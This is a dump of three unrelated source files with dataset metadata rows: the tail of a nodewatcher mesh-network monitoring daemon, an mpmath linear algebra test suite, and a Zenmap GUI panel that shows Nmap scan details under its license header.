rn.save()
except Node.DoesNotExist:
pass
notice.delete()
n.awaiting_renumber = False
n.save()
nodesToPing.append(nodeIp)
else:
n.last_seen = datetime.now()
n.peers = len(nodes[nodeIp].links)
# Create a warning since node is not registered
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
n.save()
dbNodes[nodeIp] = n
except Node.DoesNotExist:
# Node does not exist, create an invalid entry for it
n = Node(ip = nodeIp, status = NodeStatus.Invalid, last_seen = datetime.now())
n.visible = True
n.node_type = NodeType.Unknown
n.peers = len(nodes[nodeIp].links)
# Check if there are any renumber notices for this IP address
try:
notice = RenumberNotice.objects.get(original_ip = nodeIp)
n.status = NodeStatus.AwaitingRenumber
n.node_type = notice.node.node_type
n.awaiting_renumber = True
except RenumberNotice.DoesNotExist:
pass
n.save(force_insert = True)
dbNodes[nodeIp] = n
# Create an event and append a warning since an unknown node has appeared
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
Event.create_event(n, EventCode.UnknownNodeAppeared, '', EventSource.Monitor)
# Add a warning to all nodes that have been stuck in renumbering state for over a week
for node in Node.objects.filter(renumber_notices__renumbered_at__lt = datetime.now() - timedelta(days = 7)):
NodeWarning.create(node, WarningCode.LongRenumber, EventSource.Monitor)
node.save()
# Mark invisible nodes as down
for node in Node.objects.exclude(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber)):
oldStatus = node.status
if node.ip not in dbNodes:
if node.status == NodeStatus.New:
node.status = NodeStatus.Pending
elif node.status != NodeStatus.Pending:
node.status = NodeStatus.Down
node.save()
if oldStatus in (NodeStatus.Up, NodeStatus.Visible, NodeStatus.Duped) and node.status == NodeStatus.Down:
Event.create_event(node, EventCode.NodeDown, '', EventSource.Monitor)
# Invalidate uptime credit for this node
node.uptime_last = None
node.save()
# Generate timestamp and snapshot identifier
timestamp = datetime.now()
snapshot_id = int(time.time())
# Setup all node peerings
for nodeIp, node in nodes.iteritems():
n = dbNodes[nodeIp]
n.redundancy_link = False
links = []
# Find old VPN server peers
old_vpn_peers = set([p.dst for p in n.get_peers().filter(dst__vpn_server = True)])
for peerIp, lq, ilq, etx, vtime in node.links:
try:
l = Link.objects.get(src = n, dst = dbNodes[peerIp])
except Link.DoesNotExist:
l = Link(src = n, dst = dbNodes[peerIp])
l.lq = float(lq)
l.ilq = float(ilq)
l.etx = float(etx)
l.vtime = vtime
l.visible = True
l.save()
links.append(l)
# Check if any of the peers has never peered with us before
if n.is_adjacency_important() and l.dst.is_adjacency_important() and not n.peer_history.filter(pk = l.dst.pk).count():
n.peer_history.add(l.dst)
Event.create_event(n, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % l.dst, aggregate = False)
Event.create_event(l.dst, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % n, aggregate = False)
# Check if we have a peering with any VPN servers
if l.dst.vpn_server:
n.redundancy_link = True
if not n.is_invalid():
# Determine new VPN server peers
new_vpn_peers = set([p.dst for p in n.get_peers().filter(visible = True, dst__vpn_server = True)])
if old_vpn_peers != new_vpn_peers:
for p in old_vpn_peers:
if p not in new_vpn_peers:
# Redundancy loss has ocurred
Event.create_event(n, EventCode.RedundancyLoss, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
for p in new_vpn_peers:
if p not in old_vpn_peers:
# Redundancy restoration has ocurred
Event.create_event(n, EventCode.RedundancyRestored, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
# Issue a warning when node requires peering but has none
if n.redundancy_req and not n.redundancy_link:
NodeWarning.create(n, WarningCode.NoRedundancy, EventSource.Monitor)
n.save()
# Archive topology information
data_archive.record_topology_entry(snapshot_id, timestamp, n, links)
# Update valid subnet status in the database
for nodeIp, subnets in hna.iteritems():
if nodeIp not in dbNodes:
continue
for subnet in subnets:
subnet, cidr = subnet.split("/")
try:
s = Subnet.objects.get(node__ip = nodeIp, subnet = subnet, cidr = int(cidr))
s.last_seen = datetime.now()
s.visible = True
except Subnet.DoesNotExist:
s = Subnet(node = dbNodes[nodeIp], subnet = subnet, cidr = int(cidr), last_seen = datetime.now())
s.visible = True
s.allocated = False
# Save previous subnet status for later use
old_status = s.status
# Set status accoording to allocation flag
if s.allocated:
s.status = SubnetStatus.AnnouncedOk
else:
s.status = SubnetStatus.NotAllocated
# Check if this is a more specific prefix announce for an allocated prefix
if s.is_more_specific() and not s.allocated:
s.status = SubnetStatus.Subset
# Check if this is a hijack
try:
origin = Subnet.objects.ip_filter(
# Subnet overlaps with another one
ip_subnet__contains = '%s/%s' % (subnet, cidr)
).exclude(
# Of another node (= filter all subnets belonging to current node)
node = s.node
).get(
# That is allocated and visible
allocated = True,
visible = True
)
s.status = SubnetStatus.Hijacked
except Subnet.DoesNotExist:
pass
# Generate an event if status has changed
if old_status != s.status and s.status == SubnetStatus.Hijacked:
Event.create_event(n, EventCode.SubnetHijacked, '', EventSource.Monitor,
data = 'Subnet: %s/%s\n Allocated to: %s' % (s.subnet, s.cidr, origin.node))
# Flag node entry with warnings flag for unregistered announces
if not s.is_properly_announced():
if s.node.border_router and not s.is_from_known_pool():
# TODO when we have peering announce registration this should first check if
# the subnet is registered as a peering
s.status = SubnetStatus.Peering
if not s.node.border_router or s.status == SubnetStatus.Hijacked or s.is_from_known_pool():
# Add a warning message for unregistered announced subnets
NodeWarning.create(s.node, WarningCode.UnregisteredAnnounce, EventSource.Monitor)
s.node.save()
s.save()
# Detect subnets that cause conflicts and raise warning flags for all involved
# nodes
if s.is_conflicting():
NodeWarning.create(s.node, WarningCode.AnnounceConflict, EventSource.Monitor)
s.node.conflicting_subnets = True
s.node.save()
for cs in s.get_conflicting_subnets():
NodeWarning.create(cs.node, WarningCode.AnnounceConflict, EventSource.Monitor)
cs.node.conflicting_subnets = True
cs.node.save()
# Remove subnets that were hijacked but are not visible anymore
for s in Subnet.objects.filter(status = SubnetStatus.Hijacked, visible = False):
Event.create_event(s.node, EventCode.SubnetRestored, '', EventSource.Monitor, data = 'Subnet: %s/%s' % (s.subnet, s.cidr))
s.delete()
# Remove (or change their status) subnets that are not visible
Subnet.objects.filter(allocated = False, visible = False).delete()
Subnet.objects.filter(allocated = True, visible = False).update(status = SubnetStatus.NotAnnounced)
for subnet in Subnet.objects.filter(status = SubnetStatus.NotAnnounced, node__visible = True):
NodeWarning.create(subnet.node, WarningCode.OwnNotAnnounced, EventSource.Monitor)
subnet.node.save()
# Remove invisible unknown nodes
for node in Node.objects.filter(status = NodeStatus.Invalid, visible = False).all():
# Create an event since an unknown node has disappeared
Event.create_event(node, EventCode.UnknownNodeDisappeared, '', EventSource.Monitor)
Node.objects.filter(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber), visible = False).delete()
# Remove invisible links
Link.objects.filter(visible = False).delete()
# Add nodes to topology map and generate output
if not getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
# Only generate topology when graphing is not disabled
topology = DotTopologyPlotter()
for node in dbNodes.values():
topology.addNode(node)
topology.save(os.path.join(settings.GRAPH_DIR, 'network_topology.png'), os.path.join(settings.GRAPH_DIR, 'network_topology.dot'))
# Ping the nodes to prepare information for later node processing
varsize_results = {}
results, dupes = wifi_utils.ping_hosts(10, nodesToPing)
for packet_size in (100, 500, 1000, 1480):
r, d = wifi_utils.ping_hosts(10, nodesToPing, packet_size - 8)
for node_ip in nodesToPing:
varsize_results.setdefault(node_ip, []).append(r[node_ip][3] if node_ip in r else None)
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
# Multiprocessing is disabled (the MONITOR_DISABLE_MULTIPROCESSING option is usually
# used for debug purpuses where a single process is prefered)
for node_ip in nodesToPing:
process_node(node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip))
# Commit the transaction here since we do everything in the same session
transaction.commit()
else:
# We MUST commit the current transaction here, because we will be processing
# some transactions in parallel and must ensure that this transaction that has
# modified the nodes is commited. Otherwise this will deadlock!
transaction.commit()
worker_results = []
for node_ip in nodesToPing:
worker_results.append(
WORKER_POOL.apply_async(process_node, (node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip)))
)
# Wait for all workers to finish processing
objects = {}
for result in worker_results:
try:
k, v = result.get()
objects[k] = v
except Exception, e:
logging.warning(format_exc())
# When GC debugging is enabled make some additional computations
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
global _MAX_GC_OBJCOUNT
objcount = sum(objects.values())
if '_MAX_GC_OBJCOUNT' not in globals():
_MAX_GC_OBJCOUNT = objcount
logging.debug("GC object count: %d %s" % (objcount, "!M" if objcount > _MAX_GC_OBJCOUNT else ""))
_MAX_GC_OBJCOUNT = max(_MAX_GC_OBJCOUNT, objcount)
# Cleanup all out of date warnings
NodeWarning.clear_obsolete_warnings(EventSource.Monitor)
if __name__ == '__main__':
# Configure logger
logging.basicConfig(level = logging.DEBUG,
format = '%(asctime)s %(levelname)-8s %(message)s',
datefmt = '%a, %d %b %Y %H:%M:%S',
filename = settings.MONITOR_LOGFILE,
filemode = 'a')
# Autodetect fping location
FPING_LOCATIONS = [
getattr(settings, 'FPING_BIN', None),
'/usr/sbin/fping',
'/usr/bin/fping',
'/sw/sbin/fping'
]
for fping_loc in FPING_LOCATIONS:
if not fping_loc:
continue
if os.path.isfile(fping_loc):
wifi_utils.FPING_BIN = fping_loc
logging.info("Found fping in %s." % fping_loc)
break
else:
print "ERROR: Failed to find fping binary! Check that it is installed properly."
exit(1)
# Autodetect graphviz location
GRAPHVIZ_LOCATIONS = [
getattr(settings, 'GRAPHVIZ_BIN', None),
'/usr/bin/neato',
'/sw/bin/neato'
]
for graphviz_loc in GRAPHVIZ_LOCATIONS:
if not graphviz_loc:
continue
if os.path.isfile(graphviz_loc):
DotTopologyPlotter.GRAPHVIZ_BIN = graphviz_loc
logging.info("Found graphviz in %s." % graphviz_loc)
break
else:
print "ERROR: Failed to find graphviz binary! Check that it is installed properly."
exit(1)
# Check if we should just update RRDs
if options.update_rrds:
print ">>> Updating RRDs..."
update_rrds()
print ">>> RRD updates completed."
exit(0)
# Check if we should just perform reverse population of RRDs
if options.reverse_populate:
try:
node = Node.objects.get(pk = options.rp_node)
except Node.DoesNotExist:
print "ERROR: Invalid node specified."
exit(1)
try:
conf = graphs.RRA_CONF_MAP[int(options.rp_graph)]
except (ValueError, KeyError):
print "ERROR: Invalid graph type specified."
exit(1)
print ">>> Reverse populating RRDs for node '%s', graph '%s'..." % (node.name, conf.__name__)
try:
graph = GraphItem.objects.filter(node = node, type = int(options.rp_graph))[0]
except IndexError:
print "ERROR: No graph items of specified type are available for this node."
exit(1)
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
RRA.reverse_populate(node, conf, archive)
exit(0)
# Check if we should just perform stress testing
if options.stress_test:
print ">>> Performing stress test..."
# Force some settings
settings.MONITOR_ENABLE_SIMULATION = True
settings.MONITOR_DISABLE_MULTIPROCESSING = True
# Check network status in a tight loop
try:
for i in xrange(1000):
check_network_status()
check_dead_graphs()
check_events()
# Output progress messages
if i > 0 and i % 10 == 0:
print " > Completed %d iterations. (%d gc objects)" % (i, len(gc.get_objects()))
except KeyboardInterrupt:
print "!!! Aborted by user."
exit(1)
except:
print "!!! Unhandled exception."
print_exc()
exit(1)
print ">>> Stress test completed."
exit(0)
# Output warnings when debug mode is enabled
if getattr(settings, 'DEBUG', None):
logging.warning("Debug mode is enabled, monitor will leak memory!")
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None):
logging.warning("All feeds are being simulated!")
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
logging.warning("Multiprocessing mode disabled.")
if getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
logging.warning("Graph generation disabled.")
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
logging.warning("Garbage collection debugging enabled.")
# Create worker pool and start processing
logging.info("nodewatcher network monitoring system is initializing...")
WORKER_POOL = multiprocessing.Pool(processes = settings.MONITOR_WORKERS)
try:
while True:
# Perform all processing
ts_start = time.time()
try:
check_network_status()
check_dead_graphs()
check_global_statistics()
check_events()
except KeyboardInterrupt:
raise
except:
logging.warning(format_exc())
# Go to sleep for a while
ts_delta = time.time() - ts_start
if ts_delta > settings.MONITOR_POLL_INTERVAL // 2:
logging.warning("Processing took more than half of monitor poll interval ({0} sec)!".format(round(ts_delta, 2)))
ts_delta = settings.MONITOR_POLL_INTERVAL // 2
sleep(settings.MONITOR_POLL_INTERVAL - ts_delta)
except:
logging.warning("Terminating workers...")
WORKER_POOL.terminate()
| agpl-3.0 | 7,879,637,176,988,811,000 | 36.925249 | 224 | 0.635846 | false |
tovrstra/sympy | sympy/mpmath/tests/test_linalg.py | 1 | 7410 | # TODO: don't use round
from __future__ import division
from sympy.mpmath import *
# XXX: these shouldn't be visible(?)
LU_decomp = mp.LU_decomp
L_solve = mp.L_solve
U_solve = mp.U_solve
householder = mp.householder
improve_solution = mp.improve_solution
A1 = matrix([[3, 1, 6],
[2, 1, 3],
[1, 1, 1]])
b1 = [2, 7, 4]
A2 = matrix([[ 2, -1, -1, 2],
[ 6, -2, 3, -1],
[-4, 2, 3, -2],
[ 2, 0, 4, -3]])
b2 = [3, -3, -2, -1]
A3 = matrix([[ 1, 0, -1, -1, 0],
[ 0, 1, 1, 0, -1],
[ 4, -5, 2, 0, 0],
[ 0, 0, -2, 9,-12],
[ 0, 5, 0, 0, 12]])
b3 = [0, 0, 0, 0, 50]
A4 = matrix([[10.235, -4.56, 0., -0.035, 5.67],
[-2.463, 1.27, 3.97, -8.63, 1.08],
[-6.58, 0.86, -0.257, 9.32, -43.6 ],
[ 9.83, 7.39, -17.25, 0.036, 24.86],
[-9.31, 34.9, 78.56, 1.07, 65.8 ]])
b4 = [8.95, 20.54, 7.42, 5.60, 58.43]
A5 = matrix([[ 1, 2, -4],
[-2, -3, 5],
[ 3, 5, -8]])
A6 = matrix([[ 1.377360, 2.481400, 5.359190],
[ 2.679280, -1.229560, 25.560210],
[-1.225280+1.e6, 9.910180, -35.049900-1.e6]])
b6 = [23.500000, -15.760000, 2.340000]
A7 = matrix([[1, -0.5],
[2, 1],
[-2, 6]])
b7 = [3, 2, -4]
A8 = matrix([[1, 2, 3],
[-1, 0, 1],
[-1, -2, -1],
[1, 0, -1]])
b8 = [1, 2, 3, 4]
A9 = matrix([[ 4, 2, -2],
[ 2, 5, -4],
[-2, -4, 5.5]])
b9 = [10, 16, -15.5]
A10 = matrix([[1.0 + 1.0j, 2.0, 2.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 9.0]])
b10 = [1.0, 1.0 + 1.0j, 1.0]
def test_LU_decomp():
A = A3.copy()
b = b3
A, p = LU_decomp(A)
y = L_solve(A, b, p)
x = U_solve(A, y)
assert p == [2, 1, 2, 3]
assert [round(i, 14) for i in x] == [3.78953107960742, 2.9989094874591098,
-0.081788440567070006, 3.8713195201744801, 2.9171210468920399]
A = A4.copy()
b = b4
A, p = LU_decomp(A)
y = L_solve(A, b, p)
x = U_solve(A, y)
assert p == [0, 3, 4, 3]
assert [round(i, 14) for i in x] == [2.6383625899619201, 2.6643834462368399,
0.79208015947958998, -2.5088376454101899, -1.0567657691375001]
A = randmatrix(3)
bak = A.copy()
LU_decomp(A, overwrite=1)
assert A != bak
def test_inverse():
for A in [A1, A2, A5]:
inv = inverse(A)
assert mnorm(A*inv - eye(A.rows), 1) < 1.e-14
def test_householder():
mp.dps = 15
A, b = A8, b8
H, p, x, r = householder(extend(A, b))
assert H == matrix(
[[mpf('3.0'), mpf('-2.0'), mpf('-1.0'), 0],
[-1.0,mpf('3.333333333333333'),mpf('-2.9999999999999991'),mpf('2.0')],
[-1.0, mpf('-0.66666666666666674'),mpf('2.8142135623730948'),
mpf('-2.8284271247461898')],
[1.0, mpf('-1.3333333333333333'),mpf('-0.20000000000000018'),
mpf('4.2426406871192857')]])
assert p == [-2, -2, mpf('-1.4142135623730949')]
assert round(norm(r, 2), 10) == 4.2426406870999998
y = [102.102, 58.344, 36.463, 24.310, 17.017, 12.376, 9.282, 7.140, 5.610,
4.488, 3.6465, 3.003]
def coeff(n):
# similiar to Hilbert matrix
A = []
for i in xrange(1, 13):
A.append([1. / (i + j - 1) for j in xrange(1, n + 1)])
return matrix(A)
residuals = []
refres = []
for n in xrange(2, 7):
A = coeff(n)
H, p, x, r = householder(extend(A, y))
x = matrix(x)
y = matrix(y)
residuals.append(norm(r, 2))
refres.append(norm(residual(A, x, y), 2))
assert [round(res, 10) for res in residuals] == [15.1733888877,
0.82378073210000002, 0.302645887, 0.0260109244,
0.00058653999999999998]
assert norm(matrix(residuals) - matrix(refres), inf) < 1.e-13
def test_factorization():
A = randmatrix(5)
P, L, U = lu(A)
assert mnorm(P*A - L*U, 1) < 1.e-15
def test_solve():
assert norm(residual(A6, lu_solve(A6, b6), b6), inf) < 1.e-10
assert norm(residual(A7, lu_solve(A7, b7), b7), inf) < 1.5
assert norm(residual(A8, lu_solve(A8, b8), b8), inf) <= 3 + 1.e-10
assert norm(residual(A6, qr_solve(A6, b6)[0], b6), inf) < 1.e-10
assert norm(residual(A7, qr_solve(A7, b7)[0], b7), inf) < 1.5
assert norm(residual(A8, qr_solve(A8, b8)[0], b8), 2) <= 4.3
assert norm(residual(A10, lu_solve(A10, b10), b10), 2) < 1.e-10
assert norm(residual(A10, qr_solve(A10, b10)[0], b10), 2) < 1.e-10
def test_solve_overdet_complex():
A = matrix([[1, 2j], [3, 4j], [5, 6]])
b = matrix([1 + j, 2, -j])
assert norm(residual(A, lu_solve(A, b), b)) < 1.0208
def test_singular():
mp.dps = 15
A = [[5.6, 1.2], [7./15, .1]]
B = repr(zeros(2))
b = [1, 2]
def _assert_ZeroDivisionError(statement):
try:
eval(statement)
assert False
except (ZeroDivisionError, ValueError):
pass
for i in ['lu_solve(%s, %s)' % (A, b), 'lu_solve(%s, %s)' % (B, b),
'qr_solve(%s, %s)' % (A, b), 'qr_solve(%s, %s)' % (B, b)]:
_assert_ZeroDivisionError(i)
def test_cholesky():
assert fp.cholesky(fp.matrix(A9)) == fp.matrix([[2, 0, 0], [1, 2, 0], [-1, -3/2, 3/2]])
x = fp.cholesky_solve(A9, b9)
assert fp.norm(fp.residual(A9, x, b9), fp.inf) == 0
def test_det():
assert det(A1) == 1
assert round(det(A2), 14) == 8
assert round(det(A3)) == 1834
assert round(det(A4)) == 4443376
assert det(A5) == 1
assert round(det(A6)) == 78356463
assert det(zeros(3)) == 0
def test_cond():
mp.dps = 15
A = matrix([[1.2969, 0.8648], [0.2161, 0.1441]])
assert cond(A, lambda x: mnorm(x,1)) == mpf('327065209.73817754')
assert cond(A, lambda x: mnorm(x,inf)) == mpf('327065209.73817754')
assert cond(A, lambda x: mnorm(x,'F')) == mpf('249729266.80008656')
@extradps(50)
def test_precision():
A = randmatrix(10, 10)
assert mnorm(inverse(inverse(A)) - A, 1) < 1.e-45
def test_interval_matrix():
a = matrix([['0.1','0.3','1.0'],['7.1','5.5','4.8'],['3.2','4.4','5.6']],
force_type=mpi)
b = matrix(['4','0.6','0.5'], force_type=mpi)
c = lu_solve(a, b)
assert c[0].delta < 1e-13
assert c[1].delta < 1e-13
assert c[2].delta < 1e-13
assert 5.25823271130625686059275 in c[0]
assert -13.155049396267837541163 in c[1]
assert 7.42069154774972557628979 in c[2]
def test_LU_cache():
A = randmatrix(3)
LU = LU_decomp(A)
assert A._LU == LU_decomp(A)
A[0,0] = -1000
assert A._LU is None
def test_improve_solution():
A = randmatrix(5, min=1e-20, max=1e20)
b = randmatrix(5, 1, min=-1000, max=1000)
x1 = lu_solve(A, b) + randmatrix(5, 1, min=-1e-5, max=1.e-5)
x2 = improve_solution(A, x1, b)
assert norm(residual(A, x2, b), 2) < norm(residual(A, x1, b), 2)
def test_exp_pade():
for i in range(3):
dps = 15
extra = 5
mp.dps = dps + extra
dm = 0
while not dm:
m = randmatrix(3)
dm = det(m)
m = m/dm
a = diag([1,2,3])
a1 = m**-1 * a * m
mp.dps = dps
e1 = expm(a1, method='pade')
mp.dps = dps + extra
e2 = m * a1 * m**-1
d = e2 - a
#print d
mp.dps = dps
assert norm(d, inf).ae(0)
mp.dps = 15
| bsd-3-clause | -955,835,800,016,135,800 | 29.493827 | 91 | 0.497571 | false |
grongor/school_rfid | lib/nmap-6.40/zenmap/zenmapGUI/ScanRunDetailsPage.py | 1 | 16962 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ***********************IMPORTANT NMAP LICENSE TERMS************************
# * *
# * The Nmap Security Scanner is (C) 1996-2013 Insecure.Com LLC. Nmap is *
# * also a registered trademark of Insecure.Com LLC. This program is free *
# * software; you may redistribute and/or modify it under the terms of the *
# * GNU General Public License as published by the Free Software *
# * Foundation; Version 2 ("GPL"), BUT ONLY WITH ALL OF THE CLARIFICATIONS *
# * AND EXCEPTIONS DESCRIBED HEREIN. This guarantees your right to use, *
# * modify, and redistribute this software under certain conditions. If *
# * you wish to embed Nmap technology into proprietary software, we sell *
# * alternative licenses (contact [email protected]). Dozens of software *
# * vendors already license Nmap technology such as host discovery, port *
# * scanning, OS detection, version detection, and the Nmap Scripting *
# * Engine. *
# * *
# * Note that the GPL places important restrictions on "derivative works", *
# * yet it does not provide a detailed definition of that term. To avoid *
# * misunderstandings, we interpret that term as broadly as copyright law *
# * allows. For example, we consider an application to constitute a *
# * derivative work for the purpose of this license if it does any of the *
# * following with any software or content covered by this license *
# * ("Covered Software"): *
# * *
# * o Integrates source code from Covered Software. *
# * *
# * o Reads or includes copyrighted data files, such as Nmap's nmap-os-db *
# * or nmap-service-probes. *
# * *
# * o Is designed specifically to execute Covered Software and parse the *
# * results (as opposed to typical shell or execution-menu apps, which will *
# * execute anything you tell them to). *
# * *
# * o Includes Covered Software in a proprietary executable installer. The *
# * installers produced by InstallShield are an example of this. Including *
# * Nmap with other software in compressed or archival form does not *
# * trigger this provision, provided appropriate open source decompression *
# * or de-archiving software is widely available for no charge. For the *
# * purposes of this license, an installer is considered to include Covered *
# * Software even if it actually retrieves a copy of Covered Software from *
# * another source during runtime (such as by downloading it from the *
# * Internet). *
# * *
# * o Links (statically or dynamically) to a library which does any of the *
# * above. *
# * *
# * o Executes a helper program, module, or script to do any of the above. *
# * *
# * This list is not exclusive, but is meant to clarify our interpretation *
# * of derived works with some common examples. Other people may interpret *
# * the plain GPL differently, so we consider this a special exception to *
# * the GPL that we apply to Covered Software. Works which meet any of *
# * these conditions must conform to all of the terms of this license, *
# * particularly including the GPL Section 3 requirements of providing *
# * source code and allowing free redistribution of the work as a whole. *
# * *
# * As another special exception to the GPL terms, Insecure.Com LLC grants *
# * permission to link the code of this program with any version of the *
# * OpenSSL library which is distributed under a license identical to that *
# * listed in the included docs/licenses/OpenSSL.txt file, and distribute *
# * linked combinations including the two. *
# * *
# * Any redistribution of Covered Software, including any derived works, *
# * must obey and carry forward all of the terms of this license, including *
# * obeying all GPL rules and restrictions. For example, source code of *
# * the whole work must be provided and free redistribution must be *
# * allowed. All GPL references to "this License", are to be treated as *
# * including the special and conditions of the license text as well. *
# * *
# * Because this license imposes special exceptions to the GPL, Covered *
# * Work may not be combined (even as part of a larger work) with plain GPL *
# * software. The terms, conditions, and exceptions of this license must *
# * be included as well. This license is incompatible with some other open *
# * source licenses as well. In some cases we can relicense portions of *
# * Nmap or grant special permissions to use it in other open source *
# * software. Please contact [email protected] with any such requests. *
# * Similarly, we don't incorporate incompatible open source software into *
# * Covered Software without special permission from the copyright holders. *
# * *
# * If you have any questions about the licensing restrictions on using *
# * Nmap in other works, are happy to help. As mentioned above, we also *
# * offer alternative license to integrate Nmap into proprietary *
# * applications and appliances. These contracts have been sold to dozens *
# * of software vendors, and generally include a perpetual license as well *
# * as providing for priority support and updates. They also fund the *
# * continued development of Nmap. Please email [email protected] for *
# * further information. *
# * *
# * If you received these files with a written license agreement or *
# * contract stating terms other than the terms above, then that *
# * alternative license agreement takes precedence over these comments. *
# * *
# * Source is provided to this software because we believe users have a *
# * right to know exactly what a program is going to do before they run it. *
# * This also allows you to audit the software for security holes (none *
# * have been found so far). *
# * *
# * Source code also allows you to port Nmap to new platforms, fix bugs, *
# * and add new features. You are highly encouraged to send your changes *
# * to the [email protected] mailing list for possible incorporation into the *
# * main distribution. By sending these changes to Fyodor or one of the *
# * Insecure.Org development mailing lists, or checking them into the Nmap *
# * source code repository, it is understood (unless you specify otherwise) *
# * that you are offering the Nmap Project (Insecure.Com LLC) the *
# * unlimited, non-exclusive right to reuse, modify, and relicense the *
# * code. Nmap will always be available Open Source, but this is important *
# * because the inability to relicense code has caused devastating problems *
# * for other Free Software projects (such as KDE and NASM). We also *
# * occasionally relicense the code to third parties as discussed above. *
# * If you wish to specify special license conditions of your *
# * contributions, just say so when you send them. *
# * *
# * This program is distributed in the hope that it will be useful, but *
# * WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the Nmap *
# * license file for more details (it's in a COPYING file included with *
# * Nmap, and also available from https://svn.nmap.org/nmap/COPYING *
# * *
# ***************************************************************************/
import gtk
from zenmapGUI.higwidgets.higboxes import HIGVBox, HIGHBox, hig_box_space_holder
from zenmapGUI.higwidgets.higtables import HIGTable
from zenmapGUI.higwidgets.higlabels import HIGEntryLabel
import zenmapCore.I18N
class ScanRunDetailsPage(HIGVBox):
def __init__(self, scan):
HIGVBox.__init__(self)
na = _('Not available')
# Command info
self.command_label = HIGEntryLabel(_('Command:'))
self.info_command_label = HIGEntryLabel(na)
self.nmap_version_label = HIGEntryLabel(_('Nmap Version:'))
self.info_nmap_version_label = HIGEntryLabel(na)
self.verbose_label = HIGEntryLabel(_('Verbosity level:'))
self.info_verbose_label = HIGEntryLabel(na)
self.debug_label = HIGEntryLabel(_('Debug level:'))
self.info_debug_label = HIGEntryLabel(na)
self.command_expander = gtk.Expander("<b>"+_("Command Info")+"</b>")
self.command_expander.set_use_markup(True)
self.command_table = HIGTable()
self.command_table.set_border_width(5)
self.command_table.set_row_spacings(6)
self.command_table.set_col_spacings(6)
self.command_hbox = HIGHBox()
self.command_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.command_hbox._pack_noexpand_nofill(self.command_table)
self.command_table.attach(self.command_label,0,1,0,1)
self.command_table.attach(self.info_command_label,1,2,0,1)
self.command_table.attach(self.nmap_version_label,0,1,1,2)
self.command_table.attach(self.info_nmap_version_label,1,2,1,2)
self.command_table.attach(self.verbose_label,0,1,2,3)
self.command_table.attach(self.info_verbose_label,1,2,2,3)
self.command_table.attach(self.debug_label,0,1,3,4)
self.command_table.attach(self.info_debug_label,1,2,3,4)
self.command_expander.add(self.command_hbox)
self._pack_noexpand_nofill(self.command_expander)
self.command_expander.set_expanded(True)
# General info:
self.start_label = HIGEntryLabel(_('Started on:'))
self.info_start_label = HIGEntryLabel(na)
self.finished_label = HIGEntryLabel(_('Finished on:'))
self.info_finished_label = HIGEntryLabel(na)
self.host_up_label = HIGEntryLabel(_('Hosts up:'))
self.info_hosts_up_label = HIGEntryLabel(na)
self.host_down_label = HIGEntryLabel(_('Hosts down:'))
self.info_hosts_down_label = HIGEntryLabel(na)
self.host_scanned_label = HIGEntryLabel(_('Hosts scanned:'))
self.info_hosts_scanned_label = HIGEntryLabel(na)
self.open_label = HIGEntryLabel(_('Open ports:'))
self.info_open_label = HIGEntryLabel(na)
self.filtered_label = HIGEntryLabel(_('Filtered ports:'))
self.info_filtered_label = HIGEntryLabel(na)
self.closed_label = HIGEntryLabel(_('Closed ports:'))
self.info_closed_label = HIGEntryLabel(na)
self.general_expander = gtk.Expander("<b>"+_("General Info")+"</b>")
self.general_expander.set_use_markup(True)
self.general_table = HIGTable()
self.general_table.set_border_width(5)
self.general_table.set_row_spacings(6)
self.general_table.set_col_spacings(6)
self.general_hbox = HIGHBox()
self.general_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.general_hbox._pack_noexpand_nofill(self.general_table)
self.general_table.attach(self.start_label,0,1,0,1)
self.general_table.attach(self.info_start_label,1,2,0,1)
self.general_table.attach(self.finished_label,0,1,1,2)
self.general_table.attach(self.info_finished_label,1,2,1,2)
self.general_table.attach(self.host_up_label,0,1,2,3)
self.general_table.attach(self.info_hosts_up_label,1,2,2,3)
self.general_table.attach(self.host_down_label,0,1,3,4)
self.general_table.attach(self.info_hosts_down_label,1,2,3,4)
self.general_table.attach(self.host_scanned_label,0,1,4,5)
self.general_table.attach(self.info_hosts_scanned_label,1,2,4,5)
self.general_table.attach(self.open_label,0,1,5,6)
self.general_table.attach(self.info_open_label,1,2,5,6)
self.general_table.attach(self.filtered_label,0,1,6,7)
self.general_table.attach(self.info_filtered_label,1,2,6,7)
self.general_table.attach(self.closed_label,0,1,7,8)
self.general_table.attach(self.info_closed_label,1,2,7,8)
self.general_expander.add(self.general_hbox)
self._pack_noexpand_nofill(self.general_expander)
self.general_expander.set_expanded(True)
self._set_from_scan(scan)
def _set_from_scan(self, scan):
"""Initialize the display from a parsed scan."""
# Command info.
self.info_command_label.set_text(scan.get_nmap_command())
self.info_nmap_version_label.set_text(scan.get_scanner_version())
self.info_verbose_label.set_text(scan.get_verbose_level())
self.info_debug_label.set_text(scan.get_debugging_level())
# General info.
self.info_start_label.set_text(scan.get_formatted_date())
self.info_finished_label.set_text(scan.get_formatted_finish_date())
self.info_hosts_up_label.set_text(str(scan.get_hosts_up()))
self.info_hosts_down_label.set_text(str(scan.get_hosts_down()))
self.info_hosts_scanned_label.set_text(str(scan.get_hosts_scanned()))
self.info_open_label.set_text(str(scan.get_open_ports()))
self.info_filtered_label.set_text(str(scan.get_filtered_ports()))
